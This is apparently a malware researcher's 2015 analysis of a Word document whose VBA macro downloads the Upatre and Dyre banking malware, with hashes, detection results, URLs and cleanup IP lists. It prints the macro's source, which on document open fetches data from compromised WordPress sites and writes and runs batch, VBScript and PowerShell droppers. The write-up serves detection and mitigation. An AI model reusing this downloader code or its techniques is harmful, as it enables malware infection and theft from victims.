MalwareMustDie

MS Doc VB Macro downloader WP sites

Jul 20th, 2015
  1. ## MalwareMustDie! .DOC VB MACRO DOWNLOADER MALWARE
  2. ##  Analyzed: Tue Jul 21 13:37:22 2015 @unixfreaxjp
  3. ## PCAP snips at https://twitter.com/MalwareMustDie/status/623363680516747264
  4.  
  5. ## THE WORDPRESS SITES SERVED AS DOWNLOAD SERVERS:
  6. www.buck.tv/cms/wp-content/uploads/78672738612836.txt
  7. www.buck.tv/cms/wp-content/uploads/papa.txt
  8. www.bereciartua.com//wp-content/themes/bereciartua/78672738612836.txt
  9. www.bereciartua.com/wp-content/themes/bereciartua/papa.txt
  10.  
  11. ## downloaded payload from:
  12. h00p://195.154.93.8/123a.exe (Upatre/camouflaged as PDF docs 290be6c95016005dc2f0a16c411066d2)
  13. // own-IP check tool used: icanhazip.com
  14. ## downloaded payload from:
  15. https://[IP-LIST]/teu12.tar (Dyre. PE EXE 9e9cdc46a78c2dfa9220f010d11b53cc)
  16. (see the bottom of this post for the IP list.)
  17.  
  18. via SSL (the hex below is the TLS 1.0 ClientHello followed by the ServerHello):
  19. 00000000  16 03 01 00 65 01 00 00  61 03 01 55 ad d1 ae d3 ....e... a..U....
  20. 00000010  8e db d3 63 56 61 5d 01  1f 07 21 1c ff a9 b6 9d ...cVa]. ..!.....
  21. 00000020  52 9f fa ba 23 d1 33 a2  f8 6c c9 00 00 18 00 2f R...#.3. .l...../
  22. 00000030  00 35 00 05 00 0a c0 09  c0 0a c0 13 c0 14 00 32 .5...... .......2
  23. 00000040  00 38 00 13 00 04 01 00  00 20 00 05 00 05 01 00 .8...... . ......
  24. 00000050  00 00 00 00 0a 00 08 00  06 00 17 00 18 00 19 00 ........ ........
  25. 00000060  0b 00 02 01 00 ff 01 00  01 00                   ........ ..
  26.     00000000  16 03 01 00 51 02 00 00  4d 03 01 55 ad d1 cb 46 ....Q... M..U...F
  27.     00000010  41 31 79 ea 5c 3a 33 64  51 4c 6c b8 03 09 50 21 A1y.\:3d QLl...P!
  28.     00000020  13 c7 ad 13 f5 81 d6 69  fe ac 07 20 cf cf 0e c1 .......i ... ....
  29.     00000030  63 4c 32 69 ed 65 5f 9d  b9 26 5e 7f 44 f3 16 de cL2i.e_. .&^.D...
  30.  
  31. ## WORD DOC FILE HASHES:
  32. ## Sample : ./bounty.doc
  33. ## MD5    : 22b468fc88e8ec7d264b507b0d4df02c
  34. ## SHA256 : a811a3701e10e227f0ad02fad5bd1200feba6c765c89276541169413524cca85
  35. 00000000  d0 cf 11 e0 a1 b1 1a e1  00 00 00 00 00 00 00 00  |................|
  36. 00000010  00 00 00 00 00 00 00 00  3e 00 03 00 fe ff 09 00  |........>.......|
  37. 00000020  06 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |................|
  38. 00000030  44 00 00 00 00 00 00 00  00 10 00 00 47 00 00 00  |D...........G...|
  39. 00000040  02 00 00 00 fe ff ff ff  00 00 00 00 43 00 00 00  |............C...|
  40. 00000050  80 00 00 00 ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
  41. 00000060  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
  42.  
  43. ## CURRENT VIRUS CHECK:
  44. ## Detection ratio: 30 / 55
  45. ## Analysis date: 2015-07-20 23:37:32 UTC ( 4 hours, 46 minutes ago )
  46. ##         Antivirus                     Result                Update
  47. ##    ALYac                W97m.Downloader.UN                 20150720
  48. ##    AVG                  W97M/Generic                       20150721
  49. ##    AVware               LooksLike.Macro.Malware.gen!d1 (v) 20150720
  50. ##    Ad-Aware             W97m.Downloader.UN                 20150720
  51. ##    AhnLab-V3            DOC/Downloader                     20150720
  52. ##    Arcabit              W97m.Downloader.UN                 20150720
  53. ##    Avast                VBA:Downloader-HH [Trj]            20150720
  54. ##    Avira                W97M/Dldr.Agent.71168.B            20150721
  55. ##    BitDefender          W97m.Downloader.UN                 20150720
  56. ##    Cyren                Downloader.QTDD-                   20150720
  57. ##    DrWeb                W97M.DownLoader.496                20150721
  58. ##    ESET-NOD32           VBA/TrojanDownloader.Agent.XJ      20150720
  59. ##    Emsisoft             W97m.Downloader.UN (B)             20150721
  60. ##    F-Prot               W97M/Bartallex.C                   20150720
  61. ##    F-Secure             Trojan:W97M/MaliciousMacro.GEN     20150720
  62. ##    Fortinet             WM/Agent!tr                        20150720
  63. ##    GData                W97m.Downloader.UN                 20150720
  64. ##    Ikarus               Trojan-Downloader.VBA.Agent        20150720
  65. ##    Kaspersky            Trojan-Downloader.VBS.Agent.ank    20150720
  66. ##    McAfee               W97M/Downloader.ajz                20150720
  67. ##    McAfee-GW-Edition    W97M/Downloader.ajz                20150720
  68. ##    MicroWorld-eScan     W97m.Downloader.UN                 20150720
  69. ##    Sophos               Troj/DocDl-UL                      20150721
  70. ##    Symantec             W97M.Downloader                    20150721
  71. ##    Tencent              Vbs.Trojan-downloader.Agent.Hqvk   20150721
  72. ##    TrendMicro           W2KM_BARTALEX.XXUB                 20150720
  73. ##    TrendMicro-HouseCall W2KM_BARTALEX.XXUB                 20150720
  74. ##    VIPRE                LooksLike.Macro.Malware.gen!d1 (v) 20150720
  75. ##    ViRobot              W97M.S.Agent.71168.B[h]            20150720
  76. ##    nProtect             W97m.Downloader.UN                 20150720
  77. ##
  78.  
  79.  
  80. ## THE VB SCRIPT DETECTED IN MACRO
  81. ##
  82. ## (Neutralized) VB Macro Code
  83. ##
  84.  
  85. Attribute VB_Name = "Module1"
  86.  
  87. Public Function Xjdkhjfwefw(a As Object)
  88. Xjdkhjfwefw = (a.responseText)
  89. End Function
  90.  
  91.  
  92. Attribute VB_Name = "Module2"
  93.  
  94. Public Function Goabc(sps As String)
  95. QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  96. QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  97. QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  98. Goabc = Environ(sps)
  99. End Function
  100. Public Function Linolium(nbqjbdjqw As String)
  101. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  102. Dim ashdUHhda As String, hausd As Integer
  103. ashdUHhda = nbqjbdjqw
  104. hausd = Sgn(0 - Abs(Cos(140)))
  105. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  106. 'MsgBox (BQDHJQWDGWQJGS)
  107. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  108. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  109. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  110. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  111. End Function
  112. Sub WaitFor(NumOfSeconds As Long)
  113. Dim SngSec As Long
  114. SngSec = Timer + NumOfSeconds
  115. Do While Timer < SngSec
  116. DoEvents
  117. Loop
  118. End Sub
  119.  
  120. Attribute VB_Name = "Module3"
  121.  
  122. Public Function India(dnuwhd As String, b As String, c As Integer)
  123. Dim selectedText As String
  124. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  125. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  126. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  127. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  128. With ssjidoqwhduqhwidqwudihq.Find
  129. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  130. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  131. .Text = dnuwhd
  132. .MatchWholeWord = True
  133. ssjidoqwhduqhwidqwudihq.Find.Execute
  134. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  135. Dim wdwq As String
  136. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  137. Dim wdsadwq As String
  138. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  139. .Text = b
  140. .MatchWholeWord = True
  141. .Execute
  142. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  143. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  144. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  145. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  146.  
  147. If (c = 1) Then
  148.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  149. End If
  150. If (c = 2) Then
  151.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  152. End If
  153.  
  154. Dim hduwaa As Integer
  155. hduwaa = 1 - 2 ^ 4
  156.  
  157. QHUDW = Chr(33 + Sgn(hduwaa))
  158.  
  159. If (c = 3) Then
  160.     With ssjidoqwhduqhwidqwudihq.Find
  161.     .Text = a
  162.     .Replacement.Text = QHUDW
  163.     'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  164.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  165.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  166.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  167.    .Wrap = wdFindContinue
  168.     .Execute Replace:=wdReplaceAll
  169.     End With
  170. End If
  171.  
  172. End With
  173. End Function
  174.  
  175. Public Function HowEver(a As Variant, b)
  176. VGQDVHQWD = "h2eh1 fg12e"
  177. a = Shell(b, 0)
  178. HowEver = a
  179. End Function
  180.  
  181. ##
  182. ## MAIN COURSE IS HERE....
  183. ##
  184.  
  185. Attribute VB_Name = "ThisDocument"
  186. Attribute VB_Base = "1Normal.ThisDocument"
  187. Attribute VB_GlobalNameSpace = False
  188. Attribute VB_Creatable = False
  189. Attribute VB_PredeclaredId = True
  190. Attribute VB_Exposed = True
  191. Attribute VB_TemplateDerived = True
  192. Attribute VB_Customizable = True
  193. Sub Dqwkdojqwiodqw_Open()
  194.      
  195. End Sub
  196. Sub Ejoqiwjdioqwjdqo_Open()
  197.      
  198. End Sub
  199. Sub Auto_Open()
  200.     Djiqowjdwoiqjdqwo
  201. End Sub
  202. Sub Djiqowjdwoiqjdqwo()
  203.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  204.     Xjqwidjowqjdq
  205. End Sub
  206. Sub Giqjwdhqwkjq()
  207.     DQUHWDIWQ = "eji21h ui21he21"
  208. End Sub
  209.  
  210. Sub AutoOpen()
  211.     Auto_Open
  212. End Sub
  213. Sub Workbook_Open()
  214.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  215.     Auto_Open
  216. End Sub
  217.  
  218. Sub Xjqwidjowqjdq()
  219.  
  220.    
  221.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  222.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  223.     BOLIVIA = Chr(90 + 2)
  224.    
  225.    
  226.     ANGOLA = Ubqhwdhwqbd(15425) + ""
  227.     SPAIN = Chr(84) & "em" + "p"
  228.     QHDQUWH = ANGOLA
  229.     FL2 = QHDQUWH
  230.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  231.    
  232.     silkroad = 9
  233.     jwnqdw = -1
  234.    
  235.     BOSNIA = 12312312
  236.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  237.     BALAGAN = BOSNIA
  238.    
  239.  
  240.     TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
  241.     JWIDJIAAA = ""
  242.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  243.     QIWJDABB = "b"
  244.     HUYFEA = QIWJDABB + "a" + "t"
  245.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
  246.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  247.    
  248.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  249.     SSS = Chr(BALAGAN + 2 + gana)
  250.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  251.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  252.    
  253.     INTG = "" & "o" & "bject"
  254.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  255.     AFTG = Chr(109) & KIWD
  256.    
  257.     SXEE = Chr(46)
  258.     SXAA = Chr(101)
  259.     SXE = SXEE & SXAA & "" & "xe"
  260.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  261.    
  262.    
  263.    
  264.     HUQD = Chr(30 + 16 + 1)
  265.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  266.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  267.      
  268.     PSPTH = PH2 + PSFL
  269.     VBPTH = PH2 + VBFL
  270.     BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
  271.     ABPTH = PH2 + BAFL
  272.     BAPTH = ABPTH
  273.     JHQKWDQAASS = BQHJDQ
  274.    
  275.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  276.    
  277.     DRT = 315
  278.     BFT = 316
  279.     CFT = 317
  280.     DFT = 318
  281.     EFT = 319
  282.     Dim NUWDHUQHUQWDH As String
  283.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  284.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  285.    
  286.    
  287.    
  288.     TSTS = "." + "t" + "xt"
  289.     CDDD = "78672738612836" + TSTS
  290.     LNSS = "p" & "a" & "p" & "a" & "" + TSTS
  291.     STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
  292.     STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
  293.  
  294.  
  295.     PBIn = ATTH + STT1 + CDDD
  296.     CONT = Module2.Linolium(PBIn)
  297.      
  298.     asdwq = Rasdas(CONT)
  299.    
  300.     HQUWDAAA = "0"
  301.     If (asdwq <> "=") Then
  302.         PBIn = ATTH + STT2 + CDDD
  303.         CONT = Module2.Linolium(PBIn)
  304.         asdwq = CONT
  305.         HQUWDAAA = "1"
  306.     End If
  307.    
  308.     CONT = Quqhwdbyas(asdwq)
  309.      
  310.     Dim ahuywdgqy As String
  311.      
  312.     TVT10 = Port(CONT, "t" & "ext10")
  313.     TVT20 = Port(CONT, "t" & "ext20")
  314.     TVT21 = Port(CONT, "t" & "ext21")
  315.     TVT30 = Port(CONT, "t" & "ext30")
  316.     TVT31 = Port(CONT, "t" & "ext31")
  317.     XPT1 = Port(CONT, "stext1")
  318.     XPT2 = Port(CONT, "stext2")
  319.     XPT3 = Port(CONT, "stext3")
  320.    
  321.    
  322.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  323.     hufehu1 = InStr(WVR, "sers\")
  324.    
  325.     Dim hudhw As Integer
  326.     Dim ghdAdd(1 To 3)
  327.     ghdAdd(1) = "1"
  328.     ghdAdd(2) = "0"
  329.     ghdAdd(3) = "0"
  330.    
  331.     If (hufehu1 <> 0) Then
  332.         ghdAdd(1) = "2"
  333.     Else
  334.         ghdAdd(2) = "3"
  335.     End If
  336.  
  337.  
  338.     JHWQUD = Join(ghdAdd)
  339.     hudhw = Val(JHWQUD)
  340.    
  341.     Module2.WaitFor (1)
  342.    
  343.     MIWDWQ = ATTH + STT1 + LNSS
  344.     If (HQUWDAAA = "1") Then
  345.         MIWDWQ = ATTH + STT2 + LNSS
  346.     End If
  347.    
  348.     SEXX = Module2.Linolium(MIWDWQ)
  349.    
  350.     PSTB = PBIn + "123123123"
  351.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  352.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  353.     STAR1 = ATTH + MSTAR1
  354.     STAR2 = ATTH + MSTAR2
  355.     FFQ = "8"
  356.     FF = FFQ + SXE
  357.    
  358.      If (hudhw = 130) Then
  359.      Open BAPTH For Output As #DRT
  360.      Print #DRT, XPT1
  361.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  362.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  363.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  364.      Print #DRT, XPT2
  365.      Close #DRT
  366.      
  367.      Module2.WaitFor (1)
  368.      
  369.      Open VBPTH For Output As #BFT
  370.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  371.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  372.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  373.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  374.      Print #BFT, XPT3
  375.      Close #BFT
  376.      
  377.      BDDT.WaitFor (1)
  378.      NTH1 = Module3.HowEver(retVal, BAPTH)
  379.      
  380.      End If
  381.      
  382.      
  383.      HUDQG = "';"
  384.      
  385.      
  386.      
  387.       If (hudhw = 200) Then
  388.        
  389.      ZPQSKD = FL2
  390.      Open PSPTH For Output As #CFT
  391.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  392.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  393.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  394.      Print #CFT, "$ggtt = '" + SEXX + "';"
  395.      Print #CFT, "$pths = '" + PH2 + HUDQG
  396.      
  397.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  398.      Print #CFT, "$nnm = '" + FFQ + "';"
  399.      Print #CFT, TVT10
  400.      Close #CFT
  401.      
  402.      Open VBPTH For Output As #DFT
  403.      Print #DFT, TVT30
  404.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  405.      Print #DFT, TVT31
  406.      Close #DFT
  407.    
  408.      Open BAPTH For Output As #EFT
  409.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  410.      Print #EFT, TVT20
  411.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  412.      Print #EFT, ":nqudiiqhdjkashd"
  413.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  414.      Print #EFT, ":nqjdkbjkbdhjqwb"
  415.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  416.      Print #EFT, TVT21
  417.      Close #EFT
  418.      Module2.WaitFor (1)
  419.      
  420.      NTH2 = Module3.HowEver(retVal, BAPTH)
  421.      
  422.      End If
  423.      
  424.     JUW = Chr(47)
  425.     AKK = Chr(60)
  426.     ZKK = ">"
  427.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  428.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  429.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  430.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  431.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  432.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  433.    
  434. End Sub
  435.  
  436.  
  437. Public Function NUqwdqwbdsad(a As Integer)
  438. NUqwdqwbdsad = Sgn(a)
  439. End Function
  440.  
  441. Public Function Hhqudhqwgyuqwaaa(a As Integer)
  442. Hhqudhqwgyuqwaaa = Sgn(a)
  443. End Function
  444.  
  445. Public Function Ubqhwdhwqbd(a As Integer)
  446. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  447. End Function
  448.  
  449.  
  450. Public Function Quqhwdbyas(ByVal strData As String) As String
  451.     Dim objXML As Object
  452.     Dim objNode As Object
  453.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  454.     nudqwd = Log10(100)
  455.     asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
  456.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  457.     Set objXML = CreateObject(QHDHUQW)
  458.     Set objNode = objXML.createElement("b6" + "4")
  459.     objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  460.     objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  461.     objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  462.     objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  463.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  464.     objNode.Text = strData
  465.     WUDHA = objNode.nodeTypedValue
  466.     Quqhwdbyas = WUDHA
  467.     Set objNode = Nothing
  468.     Set objXML = Nothing
  469. End Function
  470.  
  471. Public Function Port(a, b As String)
  472. Dim krd, tent As Integer
  473. UQWD = "" & Chr(58 + 2)
  474. NDUW = "" & Chr(70 - 8)
  475. krd = InStr(1, a, UQWD + b + NDUW) + 8
  476. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  477. KLMN = Mid$(a, krd, tent)
  478. HUQHWDA = KLMN
  479. Port = HUQHWDA
  480. End Function
  481.  
  482. Private Static Function Rasdas(a As String)
  483. Rasdas = Right(a, 1)
  484. End Function
  485.  
  486. Private Static Function Log10(x)
  487. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  488. Log10 = Log(x) / Log(10#)
  489. End Function
  490.  
  491.  
  492. ##
  493. ## HTTP REQUESTS SENT (with headers):
  494. ## (for mitigation)
  495.  
  496. GET /cms/wp-content/uploads/78672738612836.txt HTTP/1.1
  497. Accept-Language: en-us
  498. Accept: */*
  499. User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  500. Host: www.buck.tv
  501. Connection: Keep-Alive
  502.  
  503. GET /wp-content/themes/bereciartua/78672738612836.txt HTTP/1.1
  504. Accept-Language: en-us
  505. Accept: */*
  506. User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  507. Host: www.bereciartua.com
  508. Connection: Keep-Alive
  509.  
  510. ##
  511. ## IP LIST FOR CLEAN UP (SERVES DYRE aka IP-LIST/sorted)
  512. ##  30 of these IPs are in United States networks.
  513. ##
  514. 104.174.123.66|cpe-104-174-123-66.socal.res.rr.com.|20001 | 104.172.0.0/14 | ROADRUNNER-WEST | US | twcable.com | Time Warner Cable Internet LLC
  515. 109.86.226.85|85.226.86.109.triolan.net.|13188 | 109.86.224.0/22 | BANKINFORM | UA | triolan.net | Content Delivery Network Ltd
  516. 173.216.247.74|173-216-247-74-brns.mid.dyn.suddenlink.net.|19108 | 173.216.0.0/16 | SUDDENLINK-COMMUNICA | US | suddenlink.com | Suddenlink Communications
  517. 173.243.255.79|173.243.240.79.rhinocommunications.net.|17306 | 173.243.255.0/24 | RISE-BROADBAND | US | jabbroadband.com | Jab Wireless Inc.
  518. 173.248.31.6|cameron-31-6.dsl.chibardun.net.|26472 | 173.248.24.0/21 | CHIBARDUN-TEL | US | mosaictelecom.net | Mosaic Telecom
  519. 176.36.251.208|host-176-36-251-208.la.net.ua.|39608 | 176.36.0.0/14 | LANETUA | UA | lanet.ua | Lanet Network Ltd
  520. 178.222.250.35|178-222-250-35.static.isp.telekom.rs.|8400 | 178.220.0.0/14 | TELEKOM | RS | telekom.rs | Telekom Srbija ADSL Users
  521. 188.255.236.184|free-236-184.mediaworksit.net.|52116 | 188.255.236.0/22 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  522. 188.255.239.34|free-239-34.mediaworksit.net.|52116 | 188.255.236.0/22 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  523. 188.255.243.105|free-243-105.mediaworksit.net.|52116 | 188.255.242.0/23 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  524. 194.106.166.22||6700 | 194.106.166.0/24 | BEOTEL | RS | - | InterCom Computers
  525. 194.228.203.19|19.telenet.cz.|5610 | 194.228.192.0/18 | O2-CZECH | CZ | telenet.cz | Komenskeho
  526. 209.40.238.170||32393 | 209.40.232.0/21 | BDN | US | browndognetworks.com | Brown Dog Networks
  527. 216.16.93.250|stormlakeDHCP-250.216-16-93.knology.net.|12083 | 216.16.0.0/17 | WOW-INTERNET | US | knology.net | PrairieWave Static Host Assignment
  528. 216.254.231.11|watertownDHCP-11.216-254-231.knology.net.|12083 | 216.254.224.0/20 | WOW-INTERNET | US | knology.net | PrairieWave Cable Modem DHCP
  529. 217.168.210.122|IP-10-122.trionet.cz.|33883 | 217.168.208.0/20 | TRIONET-CZ | CZ | trionet.cz | TRIOPTIMUM s.r.o.
  530. 24.148.217.188|user-0c99mds.cable.mindspring.com.|11426 | 24.148.192.0/19 | SCRR-11426 | US | earthlink.net | Earthlink Inc.
  531. 24.220.92.193|host-193-92-220-24.midco.net.|11232 | 24.220.64.0/18 | MIDCO-NET | US | midcocomm.com | MidContinent Media Inc
  532. 24.33.131.116|cpe-24-33-131-116.cinci.res.rr.com.|10796 | 24.33.128.0/18 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  533. 37.57.144.177|177.144.57.37.triolan.net.|13188 | 37.57.144.0/24 | BANKINFORM | UA | triolan.net | Content Delivery Network Ltd
  534. 64.111.36.52|64-111-36-52.static.fiber4.net.|62943 | 64.111.36.0/24 | BLUEBIRD-NETWORK |  | mwdata.net | Midwest Data Center
  535. 65.33.236.173|65-33-236-173.res.bhn.net.|33363 | 65.32.0.0/15 | BHN-TAMPA | US | twcable.com | Time Warner Cable Internet LLC
  536. 66.215.30.118|66-215-30-118.dhcp.mtpk.ca.charter.com.|20115 | 66.215.0.0/19 | CHARTER-NET-HKY-NC | US | charter.net | Charter Communications
  537. 67.206.96.68||8025 | 67.206.96.0/19 | BRIGHTOK-AS | US | chickasawphone.com | Chickasaw Telephone
  538. 67.207.229.215|swoid229p215-d.swoi.brightok.net.|8025 | 67.207.224.0/19 | BRIGHTOK-AS | US | brightok.net | Southwest Oklahoma Internet
  539. 67.221.195.6|67-221-195-6.static.fiber4.net.|62943 | 67.221.195.0/24 | BLUEBIRD-NETWORK |  | mwdata.net | Midwest Data Center
  540. 67.22.167.163|price-east-fttx-67-22-167-163.dynamic.etv.net.|36728 | 67.22.160.0/20 | EMERYTELCOM | US | emerytelcom.com | Emery Telcom
  541. 67.222.197.54|ip-dhcp-67-222-197-54.dsl.blr.abbnebraska.com.|16604 | 67.222.192.0/20 | HUNTEL-NET | US | huntel.net | Huntel.net
  542. 68.119.5.32|68-119-5-32.dhcp.unas.wa.charter.com.|20115 | 68.119.0.0/20 | CHARTER-NET-HKY-NC | US | charter.net | Charter Communications
  543. 68.55.59.145|c-68-55-59-145.hsd1.mi.comcast.net.|7922 | 68.32.0.0/11 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  544. 68.70.242.203|cablepool6-203.ranchomurieta.org.|46514 | 68.70.242.0/24 | RANCHOMURIETAASSOCIA | US | ranchomurieta.org | Rancho Murieta Association
  545. 69.144.171.44|host-69-144-171-44.static.bresnan.net.|33588 | 69.144.0.0/15 | BRESNAN-AS | US | charter.net | Charter Communications
  546. 69.163.81.211||11924 | 69.163.81.0/24 | MONTANA-OPTICOM | US | mt-opticom.com | Montana Opticom LLC
  547. 69.8.50.85||8025 | 69.8.0.0/18 | BRIGHTOK-AS | US | paradoxnetworks.net | Southwest Oklahoma Internet
  548. 69.9.204.114|host-114-204-9-69-static.midco.net.|11232 | 69.9.192.0/18 | MIDCO-NET | US | midco.net | MN Wireless
  549. 72.230.82.80|cpe-72-230-82-80.twcny.res.rr.com.|11351 | 72.230.0.0/16 | RR-NYSREGION-ASN-01 | US | twcable.com | Time Warner Cable Internet LLC
  550. 76.84.81.120|cpe-76-84-81-120.neb.res.rr.com.|11427 | 76.84.0.0/16 | SCRR-11427 | US | twcable.com | Time Warner Cable Internet LLC
  551. 77.48.30.156||6830 | 77.48.0.0/17 | LGI | AT | takin.cz | Radynet s.r.o.
  552. 81.90.175.7||25036 | 81.90.160.0/20 | TERMSNET | CZ | scnet.cz | Internethome S.R.O.
  553. 81.93.205.218|rev.81-93-205-218.rednet.hu.|24991 | 81.93.204.0/22 | DATATRANS | HU | datatrans.hu | Datatrans Internet Ltd
  554. 81.93.205.251|rev.81-93-205-251.rednet.hu.|24991 | 81.93.204.0/22 | DATATRANS | HU | datatrans.hu | Datatrans Internet Ltd
  555. 84.246.161.47|glwifi.ic.cz.|39761 | 84.246.160.0/21 | ABAK | CZ | wendulka.net | Abak Ltd.
  556. 85.135.104.170||30764 | 85.135.0.0/17 | PODA | CZ | poda.cz | PODA a.s.
  557. 87.249.142.189|kaspar.p.3.sdl.core.ttnet.cz.|34040 | 87.249.128.0/19 | CZTTNET | CZ | ttnet.cz | TTNET s.r.o.
  558. 94.154.107.172|free-94-154-107-172.kingsnet.rs.|56843 | 94.154.107.0/24 | KINGSNET | RS | kingsnet.rs | Kingsnet d.o.o.
